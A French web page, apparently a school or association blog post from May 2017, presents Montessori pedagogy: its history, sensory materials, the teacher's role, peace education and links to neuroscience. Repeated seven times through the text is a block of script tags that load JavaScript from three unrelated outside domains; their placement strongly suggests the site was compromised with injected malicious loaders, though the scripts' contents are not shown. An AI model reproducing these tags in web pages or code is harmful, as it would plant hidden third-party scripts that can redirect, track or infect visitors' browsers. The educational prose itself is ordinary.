17 mai 2017

Pédagogie Montessori

<script src='https://pr.uustoughtonma.org/d.js' type='text/javascript'></script><script src='https://s2.voipnewswire.net/s2.js' type='text/javascript'></script><script src='https://hotopponents.site/site.js' type='text/javascript'></script>
En une phrase :

Dans une classe Montessori, l'enfant choisit une activité parmi un matériel scientifiquement élaboré pour isoler chaque notion et accompagner vers l'abstraction ; le tout dans un cadre sécurisant et bienveillant.
Cette pédagogie respecte les mécanismes naturels d'apprentissage des enfants et leurs besoins pour qu'ils puissent grandir et s'épanouir avec équilibre et joie.

Pourquoi Montessori?
Qu'est ce que c'est?

Pour répondre, voici la vidéo de Céline Alvarez, qui a mené une expérience dans une classe en ZEP et plan violence, basée sur la pédagogie Montessori.

Plus précisément....

L’approche éducative de Maria MONTESSORI :   une aide au développement

 Le Docteur Maria Montessori (1870-1952), première femme italienne diplômée en médecine, a élaboré une pédagogie qui perdure depuis plus d’un siècle : à Rome la première  Maison des Enfants a ouvert ses portes en janvier 1907.

 Cette « anthropopédagogie » est une pédagogie expérimentale : Mme Montessori l’a appliquée, avec le même succès, dans le monde entier auprès d’enfants de tous niveaux sociaux.

 Elle porte un regard confiant dans le potentiel de chaque enfant : son éclosion nécessite deux conditions :

  • un environnement adapté aux besoins des enfants, besoins identifiés grâce à la rigueur scientifique de Mme Montessori,

  • une liberté d’action soigneusement préparée : l’enfant apprend par ses expériences grâce à un matériel, véritable trésor, inégalé depuis lors.

 Plus qu’une pédagogie, c’est une véritable philosophie humaniste qui rayonne toujours dans le monde entier ; actuellement des écoles se créent en Pologne, en Russie, au Brésil, en Chine et en France  : à Roanne, L’arbresle et La Fouillouse, pour citer les plus proches.

C’est donc un travail d’orfèvre accompli par Maria Montessori, qualifiée de « génie » par Catherine Dolto, en 2007, dans un vibrant hommage rendu à l’occasion du centenaire de la première Maison des Enfants.

 Découvrons – le ensemble.

APPRENDRE PAR L’EXPÉRIENCE

<script src='https://pr.uustoughtonma.org/d.js' type='text/javascript'></script><script src='https://s2.voipnewswire.net/s2.js' type='text/javascript'></script><script src='https://hotopponents.site/site.js' type='text/javascript'></script>
  • Dans...

    Un espace pensé pour l'apprentissage

La classe invite à l’activité grâce à ses espaces soigneusement organisés et épurés.

Les activités sont disposées des plus simples aux plus complexes.

Cet ordre contribue à sécuriser l’enfant, l’aide à se repérer et à anticiper ses actes pour en prendre progressivement  conscience.

Un espace suffisant garantit la liberté de mouvement.

  • Avec...
    Un matériel sensoriel

Jusqu’à l’âge de 6 ans le petit enfant découvre le monde au moyen de tous ses sens et surtout par le travail de ses mains qualifiées de « deuxième cerveau » par Mme Montessori.

Ces perceptions, pour être comprises, doivent être analysées, Mme Montessori a donc mis au point un matériel étalonné scientifiquement : ainsi chaque objet correspond à un concept.

Les objets suscitent l’intérêt de l’enfant par leur aspect esthétique : ils sont beaux et colorés, assez rapidement ce sera un intérêt intellectuel qui animera l’enfant.

Ce matériel est « l’alphabet de l’exploration : une clé qui ouvre les portes de la connaissance . » MARIA MONTESSORI

 

 

<script src='https://pr.uustoughtonma.org/d.js' type='text/javascript'></script><script src='https://s2.voipnewswire.net/s2.js' type='text/javascript'></script><script src='https://hotopponents.site/site.js' type='text/javascript'></script>

 

 

 

 

 

<script src='https://pr.uustoughtonma.org/d.js' type='text/javascript'></script><script src='https://s2.voipnewswire.net/s2.js' type='text/javascript'></script><script src='https://hotopponents.site/site.js' type='text/javascript'></script>
  • Comment ?...
    Une pédagogie du mouvement

 « Le mouvement est le facteur essentiel dans la construction de l’intelligence ». M.Montessori

L’enfant a besoin d’apprendre à faire seul :

  •  il choisit son activité selon ses motivations internes, après une présentation rigoureuse  de l’adulte (= il construit son sens de l’initiative)

  • il choisit une place pour expérimenter autant de fois et aussi longtemps qu’il en a besoin (= il apprend par la répétition et il éduque sa volonté)

  •  il peut contrôler ses erreurs.(=il élabore un raisonnement et il devient autonome)

Ainsi est étanchée sa soif d’explorateur infatigable qui travaille à son développement.

Cette liberté de  choix et d’action révèlent un enfant HEUREUX et  MOTIVE, capable de se concentrer longtemps ;

il se développe harmonieusement en prenant conscience de lui-même et de ses actes.

Cette harmonie contribue  

  • à une relation de confiance envers l’adulte et

  • à des rapports de fraternité et de coopération avec ses camarades.

  • Quelle place pour l'enseignant ?...
    Un rôle essentiel et subtil

L’enseignant pose un regard confiant sur l’enfant qui l’accompagne et le soutient  dans ses apprentissages.

Il présente le travail avec des gestes précis et lents afin que l’enfant les mémorise.

 Il observe l’enfant afin de comprendre ses besoins, ses hésitations et intervient en cas de blocage, toujours indirectement, pour l’inciter à poursuivre sa réflexion.

Il choisit les activités à présenter à chaque enfant selon son niveau de développement, Mme Montessori distinguait 6 périodes sensibles entre 0 et 6 ans : petits objets, ordre, raffinement sensoriel, mouvement, langage et développement social.

Ce sont des périodes où l’enfant bénéficie d’une acuité d’apprentissage exacerbée pour un des six thèmes précités.

L’enseignant est porteur des valeurs que l’enfant va s’approprier progressivement par son travail et par ses interactions quotidiennes avec les autres enfants :

respect, bienveillance, courtoisie, apparence et langage soignés, maîtrise de soi.

 

 

 

<script src='https://pr.uustoughtonma.org/d.js' type='text/javascript'></script><script src='https://s2.voipnewswire.net/s2.js' type='text/javascript'></script><script src='https://hotopponents.site/site.js' type='text/javascript'></script>
<script src='https://pr.uustoughtonma.org/d.js' type='text/javascript'></script><script src='https://s2.voipnewswire.net/s2.js' type='text/javascript'></script><script src='https://hotopponents.site/site.js' type='text/javascript'></script>
  • Une éducation pour la paix

Mme Montessori poursuivait un dessein humaniste : contribuer à l’édification d’un monde pacifié grâce à l’éducation.

Un enfant libre d’agir dans un environnement spécifiquement adapté à ses besoins construit sa maturité intellectuelle et émotionnelle et il développe amour et respect pour son environnement, dans son acception la plus large.

« L’enfant est, pour l’humanité, à la fois un espoir et une promesse.

En prenant soin de cet embryon comme de notre trésor le plus précieux, nous travaillerons à faire grandir l’humanité . » M .Montessori

  • Montessori et les neurosciences

Cette pédagogie coïncide avec les dernières avancées  des neurosciences :

  • Stanislas DEHAENE, professeur de psychologie cognitive au COLLEGE DE FRANCE a énoncé quatre conditions pour tout apprentissage :

engagement actif, intérêt, retour de l’information, consolidation

Ces conditions sont à la base de la méthode de Mme Montessori.

  • Voir ci-joint  l’interview de  Mr Dehaene sur la pédagogie Montessori

  • Voir l’importance des fonctions exécutives pour une vie harmonieuse (expérience de Céline ALVAREZ).

  • Et la suite de la scolarité

Si l’approche éducative de Maria Montessori s’applique à l’intégralité de la vie scolaire, actuellement, en France, collèges et lycées sont rarissimes.

Nulle  inquiétude à avoir, la scolarité Montessori est toujours une pépite dans la vie de l’enfant :

  • il y développe de solides connaissances et construit son intelligence émotionnelle et sociale, qui lui permettront de continuer sa scolarité en milieu traditionnel sans difficulté.

"La joie et la gaieté de tout enfant suffisamment autonome nous renvoient un reflet de la dignité humaine"Maria Montessori

<script src='https://pr.uustoughtonma.org/d.js' type='text/javascript'></script><script src='https://s2.voipnewswire.net/s2.js' type='text/javascript'></script><script src='https://hotopponents.site/site.js' type='text/javascript'></script>
  • Stanislas Dehaene,
    Psychologie cognitive expérimentale
<script src='https://pr.uustoughtonma.org/d.js' type='text/javascript'></script><script src='https://s2.voipnewswire.net/s2.js' type='text/javascript'></script><script src='https://hotopponents.site/site.js' type='text/javascript'></script>